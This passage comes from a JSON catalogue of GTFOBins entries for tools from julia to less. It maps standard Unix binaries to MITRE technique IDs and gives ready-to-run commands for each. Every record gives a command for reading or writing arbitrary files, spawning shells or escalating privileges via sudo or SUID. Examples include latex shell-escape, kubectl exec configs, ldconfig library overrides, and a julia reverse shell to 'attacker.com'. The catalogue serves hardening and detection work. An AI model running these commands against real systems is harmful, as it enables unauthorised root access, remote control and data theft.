\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-read:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-write:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-write:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-write:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:reverse-shell:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:reverse-shell:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:reverse-shell:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:shell:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh`)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:shell:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh -p`)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:shell:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh`)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:knife:inherit:0:sudo","toolId":"gtfo:knife","toolName":"knife","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"knife exec -E '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/knife/"]},{"id":"gtfo:knife:inherit:0:unprivileged","toolId":"gtfo:knife","toolName":"knife","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"knife exec -E '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/knife/"]},{"id":"gtfo:ksshell:file-read:0:sudo","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ksshell/"]},{"id":"gtfo:ksshell:file-read:0:suid","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ksshell/"]},{"id":"gtfo:ksshell:file-read:0:unprivileged","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ksshell/"]},{"id":"gtfo:ksu:shell:0:sudo","toolId":"gtfo:ksu","toolName":"ksu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ksu -q -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ksu/"]},{"id":"gtfo:kubectl:shell:0:sudo","toolId":"gtfo:kubectl","toolName":"kubectl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file <<EOF\nclusters:\n- cluster:\n server: https://x\n name: x\ncontexts:\n- context:\n cluster: x\n user: x\n name: x\ncurrent-context: x\nusers:\n- name: x\n user:\n exec:\n apiVersion: client.authentication.k8s.io/v1\n interactiveMode: Always\n command: /bin/sh\n args:\n - '-c'\n - '/bin/sh 0<&2 1>&2'\nEOF\n\nkubectl get pods --kubeconfig=/path/to/temp-file","description":"The shell is spawn multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:kubectl:shell:0:unprivileged","toolId":"gtfo:kubectl","toolName":"kubectl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file <<EOF\nclusters:\n- cluster:\n server: https://x\n name: x\ncontexts:\n- context:\n cluster: x\n user: x\n name: x\ncurrent-context: x\nusers:\n- name: x\n user:\n exec:\n apiVersion: client.authentication.k8s.io/v1\n interactiveMode: Always\n command: /bin/sh\n args:\n - '-c'\n - '/bin/sh 0<&2 1>&2'\nEOF\n\nkubectl get pods --kubeconfig=/path/to/temp-file","description":"The shell is spawn multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:kubectl:upload:0:sudo","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:kubectl:upload:0:suid","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:kubectl:upload:0:unprivileged","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:last:file-read:0:sudo","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/last/"]},{"id":"gtfo:last:file-read:0:suid","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/last/"]},{"id":"gtfo:last:file-read:0:unprivileged","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/last/"]},{"id":"gtfo:latex:file-read:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-read:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-read:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-write:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-write:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-write:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:shell:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:shell:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:shell:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latexmk:file-read:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}' >/path/to/temp-file\nlatexmk -dvi /path/to/temp-file\nstrings temp-file.dvi","description":"The read file will be part of the output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:file-read:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}' >/path/to/temp-file\nlatexmk -dvi /path/to/temp-file\nstrings temp-file.dvi","description":"The read file will be part of the output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:inherit:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"latexmk -e '...'","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:inherit:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"latexmk -e '...'","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:shell:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latexmk -pdf -pdflatex='/bin/sh #' /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:shell:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"latexmk -pdf -pdflatex='/bin/sh #' /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:ld.so:shell:0:sudo","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ld.so/"]},{"id":"gtfo:ld.so:shell:0:suid","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh -p","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ld.so/"]},{"id":"gtfo:ld.so:shell:0:unprivileged","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ld.so/"]},{"id":"gtfo:ldconfig:library-load:0:sudo","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ldconfig/"]},{"id":"gtfo:ldconfig:library-load:0:suid","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ldconfig/"]},{"id":"gtfo:ldconfig:library-load:0:unprivileged","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ldconfig/"]},{"id":"gtfo:less:command:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"cp /path/to/command ~/.lessfilter\nless /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:command:1:sudo","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"LESSOPEN='/path/to/command # %s' less /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:command:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"LESSOPEN='/path/to/command # %s' less /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:0:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:0:suid","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:1:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:1:suid","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:2:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"LESSOPEN='echo /path/to/input-file # %s' less /etc/hosts","description":"This can be used to read another file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:2:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"LESSOPEN='echo /path/to/input-file # %s' less /etc/hosts","description":"This can be used to read another file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-write:0:sudo","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-write:0:suid","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-write:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:inherit:0:sudo","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:inherit:0:suid","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:inherit:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:0:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"less 